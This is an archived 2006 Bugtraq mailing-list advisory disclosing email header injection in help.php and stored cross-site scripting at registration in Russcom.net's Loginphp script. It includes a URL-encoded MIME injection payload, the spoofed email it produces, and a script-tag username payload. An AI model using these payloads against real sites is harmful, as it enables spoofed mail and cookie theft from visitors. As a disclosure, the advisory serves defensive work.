lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060502143300.27321.qmail@securityfocus.com>
Date: 2 May 2006 14:33:00 -0000
From: zerogue@...il.com
To: bugtraq@...urityfocus.com
Subject: Russcom.net Loginphp multiple vulnerabilties


Russcom.net Loginphp multiple vulnerabilties

Discovered by: Nomenumbra
Date: 5/2/2006
impact:moderate (privilege escalation,possible defacement)

Russcom.net's loginphp script is a small usermanagement script:
Users can sign up for a username which they can use to login to the password protected main page.
The administrator can delete users. He can also edit the main page.
This script includes the members and help pages.

It is possible to send spoofed mails in MIME-format trough help.php due to improper filtering:

The php mail function is used like:

mail([RECIPIENT],[SUBJECT],[MESSAGE],[EXTRAHEADERS], [EXTRAPARAMS]); 

By following the rules provided in RFC 822 we can inject a message in MIME-format like this:

haxor@...ack.com%0AContent-Type:multipart/mixed;%20boundary=frog;%0A--frog%0AContent-Type:text/html%0A%0A
 My%20Message.%0A--frog--

to get this message:

To: recip@...t.xxx
 Subject: Visit www.website.xxx !
 From: haxor@...ack.xxx
 Content-Type:multipart/mixed; boundary=frog;
 --frog
 Content-Type:text/html
 
 My Message.
 --frog--
 
 Hello,
 A friend thought you might want to see this page : www.website.xxx.
 Bye Bye

for more information: http://www.securephpwiki.com/index.php/Email_Injection

In the register function you can subscribe with the following username (for example):

<script>alert('xss')</script> the input isn't sanitized so you can insert any XSS (30 char max) and anyone who will visit the page displaying
all users will get XSS'd (potentially cookies stolen).

Nomenumbra/[0x4F4C]


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ